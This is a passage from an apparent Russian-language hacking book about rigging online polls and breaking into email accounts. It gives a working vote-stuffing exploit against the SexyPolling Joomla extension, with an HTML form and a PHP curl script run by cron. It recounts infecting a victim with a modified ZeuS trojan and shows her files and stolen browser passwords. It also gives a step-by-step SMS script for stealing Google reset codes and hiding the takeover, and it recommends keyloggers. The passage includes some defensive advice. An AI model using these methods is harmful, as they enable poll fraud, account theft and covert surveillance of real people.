Как защититься – зависит от того, какую тактику будет использовать сервис накрутки. Как правило, используется или накрутка с помощью анонимайзеров, или же специалисты сервиса ищут уязвимости в голосовалке. Администратору голосовалки можно посоветовать проанализовать логи сервера на предмет подозрительной активности – один или несколько участников стали быстро набирать голоса. Не только посредством бэканда голосовалки можно посмотреть, кто голосовал, но и посредством логов средства – нужно отфильтровать лог доступа (как правило, он называется access.log) по названию сценария, зачисляющего голоса. Например, если сценарий называется poll.php и ему передается два параметра – id (номер голосования) и pid (номер участника), то команда будет выглядеть так:

#### cat access.log | grep poll.php?id=1&pid=1703

Все зависит от реализации самого сценария опроса. Если он принимает данные методом GET, тогда этот способ поможет выяснить, с каких IP происходило голосование за конкретного кандидата и как часто оно происходило.

Если же обращение к сценарию проходит посредством POST, нужно научить его логировать POST-запросы. В этом тебе поможет libapache2-modsecurity, а дополнительную информацию найдете в Интернете.

#### Способ 3. Накрутка с помощью анонимайзеров

Способ номер 3 подразумевает накрутку с помощью анонимайзеров, прокси, Тог и других средств для смены IP.

#### Способ 4. Взлом сценария для голосования

Как ты уже догадался, мы подробно остановимся на двух последних способах. Ведь недостаток первого способа – не факт, что кто-то проголосует, то есть гарантированного количества голосов получить нельзя. Недостаток второго способа – нужно платить реальные деньги, с которыми всегда жалко расставаться.

А вот два последних способа позволяют накрутить счетчик и получить результат в любом случае, да еще и бесплатно. Админам не нужно расстраиваться: лекарство есть.

#### 2.3.2. Накрутка с помощью анонимайзеров

Анонимайзер – это сайт, позволяющий зайти на сайт под другим IPадресом.

Все достаточно просто: ты заходишь на сайт анонимайзера, вводишь адрес странички голосования, переходишь на нее (она считает тебя уже новым пользователем, так как IP-адрес сменен) и голосуешь. Далее нужно сменить анонимайзер или выбрать другой сервер в списке, если сайт анонимайзера позволяет это сделать.

Найти анонимайзер очень просто – по запросу "anonymizer free" в Google. Неплохие ресурсы:

https://hidester.com/proxy/ https://hide.me/en/proxy http://kproxy.com/ https://whoer.net/webproxy https://www.hidemyass.com/ https://www.proxysite.com/

Все они позволяют выбрать различные серверы, поэтому с помощью одного сайта ты сможешь добавить несколько голосов.

Если анонимайзер позволяет установить параметры соединения, обязательно сними галку с **Remove Scripts** – скрипты (вроде JavaScript) часто используются голосовалками, и без них опросник работать не будет.

	http://buzzybuzz.biz		
Connect through		More options	
Random server		Set up your connection	^
		Encrypt URL	0
By clicking "Agree & Conr	nect" you confirm you have read and agree	Disable Cookies	Ø
	Acceptable Use Policy which govern y	Remove Scripts	. 0
			and the second second

Рис. 2.1. Не включай "Remove Scripts"

#### 2.3.3. Анонимные прокси

Здесь принцип такой же, как и у анонимайзера: меняешь IP, заходишь на сайт голосовалки и голосуешь. Вот только использовать его менее удобно. Первым делом нужно получить список анонимных прокси. Вот ресурсы, где регулярно публикуют такие списки:

https://hidemyna.me/en/proxy-list/#list

https://free-proxy-list.net/anonymous-proxy.html

😵 Tree Provy Lat — HideMy name 🗴 — Anjunyo oux Provy L	t-Yearies in the	te state a factor of	M. Asses		1,22,23				a ' X
<ul> <li>C O A https://hidemyna.me/en/prosy-lsQ</li> </ul>	Plist	and the second of the second		2015		Carlo Maria	Dyi 1	9 4 6 9 1	•
Co A Po	intry I countries(137) t number @ parate with conin	Proxy speed III ms	Pro F S	xy Type ( (TTP (TTPS iocks 4 iocks 5	An An	onymity ⊜ High Medium Low No			
	Show Do not know ho	API access	Export:	Sile.es	а о 🗊	схан Схан			
IP ad	ress Port	Country, City	Speed	Туре	Anonymity	Last check			
176.10	7.80.110 58901	💼 Russian Federation Kashira	5100 ms *	нттр	High	2 minutes			•
190.11	.15.14 53281	🛋 Ecuador	5100 ms	нттр	High	2 minutes			
118.17	4.220.28 34107	# Thailand	1 S100 ms	нттр	High	2 minutes			
181,11	3.7.194 57087	📾 Ecuador	🖠 3920 ms	нттр	High	2 minutes			
103.10	5.68.124 39761	🗯 Indonesia Bekasi	2600 ms	нттр	High	2 minutes	Support online!		

#### Рис. 2.2. Список анонимных прокси

Конечно, это не единственные списки прокси, но в Сети ты без проблем найдешь еще с десяток списков. Первый список наиболее удобен, поскольку позволяет отфильтровать список по типу прокси (нам нужен HTTP или HTTPS в зависимости от адреса сайта-голосовалки), стране, номерам портов, анонимности и т.д.

Как показывает практика, на колонку **Speed** можно не обращать внимания – это скорость доступа этого сервиса к прокси. У тебя она может быть другая, например, прокси может отлично работать со скоростью 5100 ms и не открываться прокси со скоростью 100 ms.

Далее алгоритм следующий:

- 1. Открываешь браузер и вводишь параметры прокси (подробные инструкции были приведены в главе 1).
- 2. Заходишь на сайт и голосуешь. Если страничка загружается медленно или вообще не загружается, пробуй следующий адрес в списке. Желательно голосовать в режиме приватного окна (инкогнито в Chrome), чтобы "голосовалка" не оставляла Cookies.
- 3. Берешь следующий адрес в списке и переходишь к п. 1.

00	Elizio     About preferenzest deneral	\$	III (T)
	Contract accurpterencessigeneral	ш П	
	Параметры соединения	and the second	×
E OCHO	Настройка прокси для доступа в Интернет		a da la compañía de l
Hava	Без прокси		
Bang	Автоматически определять настройки прокси для этой сети		
Dayon	Исподъзовать системные настройки прокси		
Защи	Ручная настройка прокси		
AKREY	НТТР прокси 177.53.217.246	Порт 578	21
	Использоваль этот прокси-сервер для всех про	токолов 1	
	SSL про <u>к</u> си	Πορτ	0
	ЕТР прокси	Порт	0
	Удея SOCKS	Πορτ	0
	SOCKS 4  SOCKS 5		
	Не использовањ прокси для		
	localnost, 127.0.0,1		
	Пример: mozilia-nissia.org. net.nz. 192.168.1.0/24		
Pacua	URL автоматической настройки прокси		
Goute		ОК Отмена	Справка
All and			

Рис. 2.3. Установка параметров прокси в Firefox

🛱 Настройки	×		-	- U.,
→ C 🏠	Firefox about:preferences#general			lii\ 🖸 🥥
		FireX Proxy		≞ · G
Ссновные	производительность	i Ukralne	а нттр	вкл
Начало	Использовать рекомендуемые настр	it 🖀 Spain	а нттр	вкл
Q Поиск	эти настрояхи рассчитаны для ваше о к	📫 🔳 Spain	al HTTP	BKIL
<ul> <li>Приватность и Защита</li> </ul>	Просмотр сайтов	🖆 🎞 Spain	и нттр	өкл
C Аккаунт Firefox	Использовать автоматическую прок	1 I-I Canada	а нттр	ВКЛ
	Использовать плавную прокрутку	united States	d HTTP	БКЛ
A March	<ul> <li>При необходимости отображать сен</li> <li>Всегда использовать клавиши курсог</li> </ul>	it 💼 Russia 🦯	al HTTP	вкл
	Искать текст на странице по мере его	if 🖬 Vietnam	al HTTP	BKJI
	Рекомендовать расширения при про	🖆 🎞 India	al HTTP	вкл
	and the second	🖆 🔳 Spain	al HTTP	вкл. 🗸
	Параметры сети	Список прокси		
🛊 Расширения и темы	Настроить, как Firefox соединяется с Инте	ернетом. Подробнее	Наст	роить
Поддержка Firefox				

Рис. 2.4. Расширение FireX Proxy для Firefox

Не забывай регулярно обновлять список прокси. "Обработал" первые две страницы списка – обновляй, появятся новые прокси, возможно, с лучшими параметрами.

Недостатки:

- Если кто-то такой же умный, как и ты, то нужно действовать быстро. Скорее всего, списки прокси окажутся и у конкурентов и IP-адреса будут заняты.
- Недостаток расширений вроде FireX Proxy ограниченный набор прокси. На сайтах, публикующих списки, выбор будет побогаче.

Помню, как-то "накручивал" голосовалку на сайте, где можно было голосовать раз в 24 часа. Соответственно, сегодня я узурпировал какой-то IP-адрес, завтра – кто-то другой. Довольно неблагодарное занятие, занимающее много времени. Поскольку человек – создание ленивое и умное, то нужно искать альтернативные решения.

Чтобы уравнять шанс, делимся с веб-мастерами, как защититься от анонимайзеров. Способ прост как мир. Некоторые голосовалки позволяют выбрать страну, с которой можно голосовать, также можно установить, можно ли повторно голосовать с одного и того же IP. В некоторых случаях разрешается голосовать с одного и того же IP через определенное время.

Значит, так: устанавливаем, что можно голосовать только из России (ты же не думаешь, что за мисс первого курса твоего универа будут голосовать из Кении, Бангладеша и Зимбабве?) и только с одного IP. Конечно, в России тоже есть анонимные прокси, но их гораздо меньше, чем во всем мире. Да и возможность проголосовать с одного IP только один раз позволит зачислить небольшое количество голосов, которое никак не повлияет на результат.

Если беспокоишься и за это небольшое количество, тогда делаем так:

- 1. Ограничиваешь возможность голосования только Россией.
- Ищешь в Инете постоянно обновляющиеся списки прокси, выбираешь только российские адреса (как правило, указывается страна прокси) и добавляешь их в .htaccess в конструкции *deny from*)
- Повторяешь пункт 2 каждый день вдруг появится новый адрес. Голосование не длится вечно, как правило, у него есть определенные сроки. Рано или поздно у тебя соберется хороший список российских прокси, который будет нужно будет обновлять, скажем, раз в месяц.

Сложнее, если сценарий не поддерживает ограничение по стране. Тогда нужно реализовать такую проверку собственными силами. Организовать проверку страны, города, региона по IP-адресу можно с помощью всевозможных сервисов.

Вот как можно получить город с помощью geoplugin.net:

function get geo city(\$ip) { \$ip data = @json decode (file get contents ("http://www.geoplugin.net/json.gp?ip=".\$ip); if (\$ip data && \$ip data->geoplugin city != null) \$result = \$ip data->geoplugin city;



А вот уже готовая функция для получения региона:

```
function get_geo_region($ip) {
   $ip_data =
   @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ip));
   if($ip_data && $ip_data->geoplugin_region != null)
   {
      $result = $ip_data->geoplugin_regionName;
   }
   return $result;
}
```

#### С помощь SxGeo организовать проверку можно так:

// Подключаем SxGeo.php класс include("SxGeo.php"); // Создаем объект \$SxGeo = new SxGeo('SxGeoCity.dat'); \$ server['REMOTE ADDR']; var export (\$SxGeo->getCityFull(\$ip)); // Вся информация о городе var export(\$SxGeo->get(\$ip)); // Краткая информация о городе или код страны (если используется база SxGeo Country)

Преимущество первого способа (geoplugin) – не нужно периодически обновлять базу IP-адресов. Но и есть недостаток – названия городов возвращаются на английском. Если для внутреннего использования, то неплохой вариант. Если же нужно организовать вывод названия города кириллицей, тогда – второй вариант. Недостаток – нужно периодически обновлять базу адресов.

Теперь включаем логику. Если у нас голосование местного масштаба (вроде мисс Краснодар), то можно смело ограничить голосование Краснодарским краем – это вполне логично, и ты отсеешь большую часть всевозможных прокси.

#### 2.3.4. Ломаем голосовалку

Последний способ самый сложный и заключается он в выявлении всевозможных "дыр" в системе голосования. Недостаток – голосовалка может не иметь слабых мест (если ее правильно спроектировали), следовательно, у тебя ничего не получится.

В данной статье будет описан эксперимент, рецепт которого был найден на просторах Сети. Цель эксперимента – выявление "дыр" в популярном расширении SexyPolling для Joomla! (https://extensions.joomla.org/extension/ sexy-polling/). Само по себе расширение довольно дырявое и подвержено SQL Injection, мы не рекомендуем его к использованию. Но в ходе проведения эксперимента были выявлены дополнительные "дыры", никак не связанные с SQL Injection.

Первым делом смотрим, как организована кнопка "Голосовать". В случае с SexyPolling это было так:



Рис. 2.5. Смотрим код страницы. По понятным причинам "все лишнее" закрыто

Как видишь, классической формы нет, обработкой нажатия кнопки занимается JavaScript-сценарий. Судя по всему, он и передает твой голос на сервер. Смотрим в <head> сценарии (хотя сценарии могут быть определены и в конце страницы). Ищем сценарий, содержащий в названии polling, poll, voting и т.д.



Рис. 2.6. Определяем сценарий голосовалки

Смотрим код сценария, чтобы понять, как он устроен. Видим, что обработка IP-адресов (попытка узнать регион и т.д.) осуществляется на стороне клиента, то есть в JavaScript. Далее становится понятно, какому сценарию передается выбранный пользователем вариант ответа, а также параметры, которые ему передаются:

th'; val(); t2'),val(); ),parant('div'),atf/('vall'); ; pating\_(div') case determinist(polling\_id) = additionaldo source = 'doin\_datab' = ain\_datab = 'doan\_ an\_nemat' = sanytegion = 'dovring\_period' = origing\_period' & 'sau, polling\_tabase'si', ALLY CAMES' + MONTH 'fien', 'field', 'data) {
 function(data) {
 data[0].Eveal(d) == 'texal(d\_tokan') {
 data[0].Eveal(d) Tokan','texp\_error');
 data
 field to takan','texp\_error';
 } \_slart(hideMasultalds[polling\_id], 'seay increas'); ralesr,find(';polling\_submit'); and lart('voted\_Button');

Рис. 2.7. Параметры, передаваемые сценарию

Далее можно попробовать передать ему эти параметры вручную. Нужно вычислить было только два значения – это ID голосования (параметр polling\_id) и номер ответа. Это можно сделать путем просмотра кода страницы. Вот ID голосования:



Рис. 2.8. Вычисляем ID голосования

Теперь находим ID ответа. Вкладка Elements в инструментах разработчика Сhrome нам поможет.



Рис. 2.9. Вычисляем ID ответа

Самый простой способ передачи POST-запроса (а судя по JavaScript-коду, отправляется именно POST-запрос) – обычная HTML-форма. Подойдет вот такая формочка:

```
<form action="http://caŭr/components/com_sexypolling/vote.php" method=post>
<input type=text name="polling_id" value="1821">
<input type=text name="sexypolling_token" value="1">
<input type=text name="answer_id[]" value="1256">
<input type=submit>
</form>
```

Передаются ID голосования, номер ответа и параметр sexypolling.

Открываем HTML-файл в браузере (желательно через Тог, чтобы не светить свой IP) и нажимаем кнопочку Submit. Далее смотрим на счетчик – о чудо! – он увеличился! Да, если бы расширение было бы написано правильно и перед увеличением счетчика проверяло бы IP-адрес, то ничего бы не вышло. А оно было организовано иначе – сначала JS проверяет IP и отображает красивый счетчик времени до следующей попытки, если человек уже голосовал с этого IP, или же "дергает" сценарий vote.php, который просто увеличивает счетчик нужного кандидата. И ему все равно, сколько вы отправили запросов – хоть 100, хоть 10000 с одного IP.



Рис. 2.10. Форма в браузере

Нажимать кнопочку – это тоже работа, поэтому можно автоматизировать сей процесс:

```
<?php

if( $curl = curl_init() ) {

   curl_setopt($curl, CURLOPT_URL,

'http://caĂT/components/com_sexypolling/vote.php');

   curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);

   curl_setopt($curl, CURLOPT_POST, true);

   curl_setopt($curl, CURLOPT_POST, true);

   curl_setopt($curl, CURLOPT_POSTFIELDS,

"polling_id=1821&sexypolling_token=1&answer_id[]=1256");

   $out = curl_exec($curl);

   //echo $out;

   curl_close($curl);

  }

?>
```

Это простейший PHP-сценарий, отправляющий POST-запрос сценарию vote.php. Думаю, сценарий понятен без каких-либо комментариев. Если у тебя есть вопросы, обратись к документации по PHP.

Далее нужно обеспечить автоматический запуск этого сценария. Если ты счастливый пользователь VDS от Xelent или же у тебя на домашнем компе установлена Linux, самым правильным способом будет добавить вызов PHP-сценария (у меня он называется test.php) в расписание *cron*:

crontab -e

В данном примере сценарий запускается каждые 5 минут. То есть каждые 5 минут твой кандидат получит голос. При желании можно запускать этот сценарий каждую минуту или вообще организовать цикл и добавить любое количество голосов сразу. Здесь уже как захочешь.

Если же у тебя есть обычный хостинг, можешь "залить" PHP-сценарий накрутки на хостинг, установить в браузер расширение перезагрузки страницы (вроде Page Reload) и настроить его на перезагрузку страницы со сценарием каждые несколько минут. Для сокрытия своего IP можно использовать Tor Browser.



Рис. 2.11. Расписание стоп

#### 2.3.6. Как защититься от взлома?

Есть три рекомендации:

- 1. Установить самую последнюю версию голосовалки. Есть шансы, что все известные "дыры" уже залатаны.
- 2. Погуглить и попытаться найти информацию об уязвимости используемого компонента. Попытаться исправить "дыры" самому или обратиться к спецам.
- 3. Конкретно в случае SexyPolling сменить на другой компонент. Если уж сильно хочется использовать именно его, добавь в код vote.php проверку региона/страны. В самой голосовалке есть возможность ограничения по стране, но ограничение не проблема обойти, поскольку сам vote.php не осуществляет такую проверку. Выше было показано, как организовать проверку региона/города по IP-адресу. Подобную проверку нужно добавить в код vote.php:

Вместо *die()* можешь организовать редирект на страничку, на которой можешь изложить все, что ты думаешь по поводу накрутки:

if (get\_geo\_city(\$ip)!=="Moscow") header('Location: nakrutka.html');

Цель эксперимента – показать, как легко можно произвести накрутку счетчика голосования при условии наличия уязвимостей в системе голосований, и описать способы защиты от противоправных действий. Ни одна реальная система не пострадала, и весь процесс производился в лабораторных условиях – на локальных машинах.



## Глава 3.

# Как взломать электронную почту

В этой главе будут рассмотрены реальные способы взлома электронной почты. Зная эти способы, ты будешь знать, какие способы используют злоумышленники и как от них защититься.

### 3.1. Троянский конь

1

Довольно распространенным способом заполучения доступа к чужому ящику является рассылка электронных писем со встроенными вирусами. Точнее, письмо содержит не сам вирус, а лишь ссылку на него. Обычно содержание письма должно чем-то "зацепить" пользователя, так чтобы он не мог не отреагировать.

Дальше все просто: пользователь переходит по ссылке, и на его компьютер загружается вредоносный код.

Примеры троянов – DarkComet RAT, SpyEye, Carberp. О DarkComet RAT много что было написано в Сети, Carberp тоже известный троян. А SpyEye – это троян, разработанный Александром Паниным, который даже засветился в сводках ФБР<sup>1</sup>.

По роду своей деятельности нам приходится исследовать информационную безопасность того или иного предприятия. Когда-то мы использовали модифицированную версию трояна ZeuS. На момент созданния модификации ее не обнаруживал ни один антивирус (рис. 3.1), к тому же в нем была функция отключения процессов, среди которых есть Dr.Web. Однако на компьютере жертвы был установлен Comodo – так даже лучше.

Итак, у нас есть модифицированный ZeuS, но как заставить жертву запустить его? Если просто отправить ей ссылку, понятное дело, она переходить по ней не будет. Обещать золотые горы в письме – тоже прошлый век, на такое пользователи уже не реагируют.

https://www.fbi.gov/news/stories/2014/january/spyeye-malware-mastermind-pleads-guilty/spyeyemalware-mastermind-pleads-guilty

SHA256: 7e9a52f9bd9	ed519b87d5419ccd97d9927feeecef2b904abf04	abe4b62a786f0
File name: Gfx/2_0.exe		
Detection ratio: 0 / 55	3 AL 14 14 14 14 14	🖝 O
Analysis date: 2015-10-29 1	2:50:40 UTC ( 6 minutes ago )	
C Probably harmless! There a	re strong indicators suggesting that this file is	safe to use
Analysis 🔀 Relationships	Additional information     Comments	Q Votes
Antivirus	Result	Update
ALYac	•	20151029
ALYac AVG	•	20161029 20151029
ALYac AVG AVware	0 0 0	20151029 20151029 20151029
ALYac AVG AVware Ad-Aware	•	20151029 20151029 20151029 20151029 20151029
AL'yac AVG Al-Ware Ad-Aware AegisLab	•	20151029 20151029 20151029 20151029 20151029 20151029
AL'yac AV/G AV/ware Ad-Aware AegisLab Agnitum	•	20151029 20151029 20151029 20151029 20151029 20151029 20151028
AL'yac AVG AVware Ad-Aware AegisLab Agnitum AhnLab-V3		20151029 20151029 20151029 20151029 20151029 20151029 20151028 20151028
ALYac AVG AVware Ad-Aware AegiaLab Agnitum AhnLab-V3 Alibaba		20151029 20151029 20151029 20151029 20151029 20151029 20151028 20151029 20151029 20151029

Puc. 3.1. Отчет VirusTotal

Когда троян создан, осталось самое малое – написать жертве письмо, в котором нужно мотивировать ее запустить троян. Здесь нужно проявить изобретательность. Конкретных рекомендаций быть не может, все зависит от "жертвы". Например, бухгалтеру можно отправить какое-то обновление бухгалтерской программы, ты, конечно, знаешь, какая программа используется и заказаны ли обновления к ней. Иначе (если обновления не заказаны), такое письмо (даже от имени якобы разработчиков программы) вызовет подозрения.

Чтобы поле **From** содержало внушительное название, а не xaker134566788@ gmail.com, были подделаны заголовки письма. Это делается довольно просто, а как именно, будет показано в способе 5. Пока не будем на это отвлекаться.

После установки трояна на компьютер жертвы он окажется полностью в твоей власти (рис. 3.2).

Что мы можем? Мы можем ради интереса просмотреть список процессов компьютера, в котором, ясное дело, не будет нашего трояна (рис. 3.3). Мы можем просмотреть файловую систему (рис. 3.4).

	/ ULIA-375772-XP	X
CLIENT OVERVIEW	FILE MANAGER PROCESS VIEW , REMOTE SHELL SAVED DATA	
Client Overview Client Information	Details	55
Client ID:	ULIA-373772-XP	0
First Seen by Server:	10/28/2015 3:29:35 AM	10
File Creation Date:	28.10.2015 13:26:15	1
Country:	Russian Federation	
Bill Client Path:	\373672/vepair.exe	
Software Information		
Derating System:	Microsoft Windows XP Professional	1
Active Window:	mmm mmmm	
B Antivirus:	Antivirus: N/A	1
· Firewall:	Firewall: N/A	
System Uptime:	0 Day(s) 7 Hours 23 Minutes	101
& User Privileges:	Admin	22.
Machine Name:	YULIA	10
& PC Username:	10000	. 1
Hardware Information	and a second	
Machine Type:	Desktop	101
CPU:	Inlei(R) Pentium(R) 4 CPU 3.00GHz	1
GPU:	Intel(R) G33/G31 Express Chipset Family.	
RAM:	2 G8	1
I Battery:	N/A (Desktop Machine)	
Monitor Count:		1
Network Information	والاستعادية والمراجعة والمؤلفة والمتوارد فتعول والمراجع والمراجع والمراجع والمراجع والمتحاد والمحاد والمحاد والمحاد	
WAN Address:	이는 사람이 가지 않는 것 같은 것 같	6.4
Download Speed:	569 KB/sec	
ILAN Address:	192.168.1.122	1
MAC Address:	002191F#6617	1
1		
La contraction of the second		

Рис. 3.2. Управление компьютером жертвы посредством Zeus

5		COST AND A DECK	/ UUA-373772-XP	
CUENT OVERVIEW	FILE MANAGE	R. PERSONAL VEW	REMOTE SHELL SAVED DATA	State of the State of
Process Name	ID	Window Title	File Location	A CONTRACTOR OF A CONTRACTOR A
googledrivesync	532	N/A	C1/Program Files\Google\Drive\googledrivesync.exe	San States and States and States
C sychost	706	N/A	C:\WINDOWS\system32\svchost.exe	
winlegon	796	N/A	\??\C:\WINDOWS\system32\winlogon.exe	
sychost	1240	N/A	C:\WINDOWS\system32\sychost.exe	
1 tv_w32	2752	N/A	C:\Program Files\TeamViewer\tv_w32.exe	
msmsgs	3552	N/A	C/\Program Files\Messenger\msmsgs.exe	
Svchost	1504	N/A	C\WINDOWS\system32\svchost.exe	
ip2launcher	5344	N/A	C:\Program Files\Java\jre1.8.0_65\bin\jp2launcher.exe	
1 tcv9	4748	"Управление торговлей"	C:\Program Files\1cv82\8.2.19.121\bin\1cv8.exe	No.
googledrivesync	3632	N/A	C:\Program Files\Google\Drive\googledrivesync.exe	
CryptoDiskService	604	N/A	C\Program Files\CyberSafe Top Secret 2\CryptoDiskService.exe	
sychost	1848	N/A	C:\WINDOWS\system32\svchost.exe	
DOUTLOOK	2824		C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	
TeamViewer	2380	N/A	C:\Program Files\TeamViewer\TeamViewer.exe	
Sychost	1044	N/A	C:\WINDOWS\system32\sychost.exe	
iexplore	4120	INCOME AND ADDRESS OF	ChProgram FilesUnternet Explorer\iexplore.exe	
10/8	5408	March - The State of the	C\Program Files\1cv82\8.2.19.121\bin\1cv8.exe	
explorer	2560	N/A	C:\WINDOWS\Explorer.EXE	
3 igfxsrvc	3264	N/A	C1WINDOWS\system32\igfxsrvc.exe	
sychost	1572	N/A	C:\WINDOWS\system32\svchost.exe	
- spoolsv	1660	N/A	C:\WINDOW5\system32\spoolsv.exe	
CSFSS	768	N/A	\??\C:\WINDOWS\system32\csrss.exe	
"] svchost	500	N/A	C:\WINDOWS\System32\svchost.exe	
iexplore	5888	N/A	COProgram Files\Internet Explorer\iexplore.exe	
gfxtray	3168	N/A	C:\WINDOWS\system32\igfxtray.exe	
Isass	852	N/A	C:\WINDOWS\system32\Isass.exe	
] jp2launcher	1669	17-19-19-19-19-19-19-19-19-19-19-19-19-19-	C:\Program Files\Java\jre1.8.0_65\bimjp2launcher.exe	
C ctfmon	3520	N/A	C1WINDOWS\system32\ctfmon.exe	
TETDCtrl	3340	N/A	C/\Program Files\Elantech\ETDCtrLexe	
Diexplore	5244	N/A	CAProgram Files\Internet Explorer\IEXPLORE.EXE	

Рис. 3.3. Список процессов на компьютере жертвы (конфиденциальная информация по понятным причинам закрашена)

-----

		1× 3176	S. 64	1	LIA-37	3772, XP
CLENT OVERVIEW THE MANAGER	PROCES		REMOTE SHELL	SAVED DATA	N.	1.1.2.2.2.2.2
A Distance of the second se	Trans.			Part Mar Mars	and the second	The shields
Pile Name	Type	Dite		creation rime		
THE INCRAME	Eolder	NUA		20.03 2012 15:11:00		
5# 373672	Folder	N/A		28 10 2015 13:26:15		
Ge 873772	Folder	N/A		28 10 2015 13 26 15		
54ad34c5ec977c77d7299c2114	Folder	N/A		12.02.2014 17:26:03		
Uli Al RecycleBin	Folder	N/A		09.12.2014 9:30:24		
Cill banks	Folder	N/A		19.02.2012 22:10:33		
Cal bcrshb_100844685	Folder	N/A		13.02.2013 11:53:39		
til bcrshb magnatnovo	Folder	N/A		22.05.2013 10:10:43		
Ein BSCInt 3	Folder	N/A		19.02.2012 22:12:01		
Gel BSCInt_3.2	Folder	N/A		19.02.2012 22:13:00		
68 85Cint_3_86PP () [100840029]	Folder	N/A		19.02.2012 22:24:48		
III BSCInt 3 Национальный Резервный Банк	Folder	N/A		19.02.2012 22:25:29		
Cit 0SCInt_RSH8	Folder	N/A		21.02.2012 12:49:23		
Config.Msi	Folder	N/A		08.10.2013 15:39:45		
Documents and Settings	Folder	N/A	15.	17.01.2012 17:09:03		
CE DrWeb Archive	Folder	N/A	1. S. 1.	25.02.2014 13:57:43		
Gil DrWeb Quarantine	Folder	N/A		25.02.2014 11:44:46		
fill HP Universal Print Driver	Folder	N/A		20.02.2012 16:04:51		
ISNU Intel	Folder	N/A		19.02.2012 23:48:18		
Cill keys	Folder	N/A		21.02.2012 15:12:36		
Cill Modemite	Folder	N/A		05.03.2013 10:20:27		
Gill MSOCache	Folder	N/A		18.03.2015 13:45:42		
La Program Files	Folder	N/A		17.01.2012 17:10:11		
San RECYCLER	Folder	N/A		17.02.2012 14:34:26		
Cili Sun	Folder	N/A		03.02.2014 9:29:08		
Oli System Volume Information	Folder	N/A		17.01.2012 17:09:07		
Cli temp	Folder	N/A		17.02.2012 15:12:25		
VBRR	Folder	N/A	- 1 N.S	19.02.2012 22:09:53		
A WINDOWS	Folder	N/A	Charles and	17.01.2012 14:28:31	647.2 S	1
C1					CSC2 States	

Рис. 3.4. Файловая система на компьютере жертвы

Конечно, самое главное, ради чего все это затевалось, – список паролей, сохраненных в браузере (рис. 3.5). Среди этих паролей был сохранен пароль к почте Gmail (см. рис. 3.5) – цель достигнута, мы получили доступ к почтовому ящику!



Рис. 3.5. А вот и пароли

Приведенный способ – только один из многих подобных. Существуют разные трояны. Некоторые не имеют рассмотренной только что панели управ-

ления, а просто сохраняют интересующую вас информацию в текстовый файл и передают по e-mail на ваш почтовый ящик.

### 3.2. Взлом по номеру телефона

Суть этого способа заключается в следующем. Злоумышленнику нужно знать номер телефона жертвы, указанный при регистрации почтового ящика. При сбросе пароля почтовая служба требует ввести последние символы номера телефона (или выбрать номер телефона из списка). На этот номер будет отправлено SMS с кодом подтверждения сброса пароля. Затем злоумышленник отправляет второе SMS с требованием указать код из предыдущего SMS. Пользователь, ничего не подозревая, отправляет код из первого SMS. Самый большой недостаток этого способа в том, что первое SMS придет от Google, а второе – с неизвестного номера. Успех этого способа зависит от сообразительности жертвы.

Последовательность действий такая:

- Нужно попытаться выполнить вход в аккаунт Google жертвы.
- Поскольку пароль мы не знаем, Google предложит нам его восстановить.
- Далее если у предполагаемой жертвы был привязан к аккаунту Androidтелефон, то Google предложит отправить оповещение на мобильный. Примечательно, но смартфон не издал ни единого звука, а просто отобразил оповещение. Если он не будет перед глазами у пользователя, есть вероятность, что тот его не заметит. Если же пользователь нажмет Нет, то не отчаивайся – повторите данный процесс несколько раз – позже поймете зачем.
- После отправки оповещения появится страница с инструкциями, внизу будет ссылка на классическую страницу сброса пароля по SMS. Отправьте SMS жертве.
- Жертва получит SMS через несколько секунд. С другого телефона отправь примерно такое сообщение:

Предотвращена попытка входа в аккаунт Google. Перешлите код подтверждения Google для разблокировки аккаунта.

Далее все зависит от смекалки пользователя. С одной стороны, пользователь может обратить внимание на неизвестный номер. С другой стороны, поставь себя на место среднестатистического пользователя. Сначала он получает уведомление о сбросе пароля, потом SMS с кодом подтверждения, а после – сообщение о том, что замечена подозрительная активность. Конечно, можно все немного усложнить и завести короткий номер, с которого и будет отправлена SMS. Получить короткий номер с названием службы, например GSecurity, не проблема. Это только повысит вероятность успеха.

Получение доступа к почтовому ящику – это еще не все. Чтобы жертва не догадалась, что ее ящик увели, после сброса пароля нужно создать временный пароль и отправить его по SMS, а самим тем временем сделать переадресацию на "хакерский" ящик. Так можно получить контроль над ящиком, не вызвав особых подозрений.

Данный способ довольно стар и с успехом используется различными "специалистами". О нем даже писали в официальном блоге компании Symantec, при желании можно просмотреть его в действии:

http://www.symantec.com/connect/blogs/password-recovery-scam-tricks-usershanding-over-email-account-access

Как говорится, лучше один раз увидеть, чем сто раз услышать.

### 3.3. Физический доступ к компьютеру

Если у нас есть доступ к компьютеру жертвы, то можно считать, что почту уже взломали. Хакер может запустить на компьютере или кейлоггер (клавиатурный шпион), или программу для "восстановления" паролей почтовых учетных записей.

Суть кейлоггера в том, что в специальный файл он записывает все, что пользователь вводит с клавиатуры. Тебе останется только второй раз подойти к компьютеру, чтобы забрать результирующий файл (или получить его по почте – есть и такие шпионы).

К преимуществам кейлоггера относится то, что он записывает все подряд. Поэтому, кроме паролей, можно получить еще много интересной информации о своей жертве. Но и недостатков у них очень много. Самый существенный – большинство кейлоггеров успешно определяются антивирусами, и если на компьютере жертвы установлен антивирус, использовать кейлоггер не получится. Ведь не всегда есть возможность отключить антивирус.

Второй недостаток вытекает из его достоинства. В результирующий файл помещается много лишней информации. Мало собрать информацию с клавиатуры, нужно еще отыскать среди всего лишнего то, что нужно, – пароль.

Третий недостаток – если жертва использует почтовый клиент, а не вебинтерфейс, то кейлоггер вообще не поможет. Скорее всего, пароль уже введен в почтовый клиент и запомнен, поэтому жертва не вводит его каждый раз при проверке почты. Следовательно, кейлоггер запишет в файл все, что вводит пользователь, кроме того, что нужно тебе.

Есть и еще один недостаток – если выбранный кейлоггер не поддерживает отправку результирующего файла по e-mail, то придется еще один раз подходить к компьютеру. Пример кейлоггера – SniperSpy<sup>2</sup> – на случай, если появится желание ним воспользоваться.

Программы для "восстановления" паролей почтовых учетных записей позволяют сразу получить все интересующие вас пароли без необходимости чтения мегабайтов текста в поиске нужного вам пароля. К тому же на них никак не реагирует антивирус. Одна из таких программ – это Mail PassView<sup>3</sup>. Она позволяет восстановить пароли следующих почтовых учетных записей:

- Outlook Express;
- Microsoft Outlook 2000 (POP3 and SMTP Accounts only);
- Microsoft Outlook 2002/2003/2007/2010/2013/2016/2019 (POP3, IMAP, HTTP and SMTP Accounts);
- Windows Mail;
- IncrediMail;
- Eudora;
- Netscape 6.x/7.x;
- Mozilla Thunderbird;
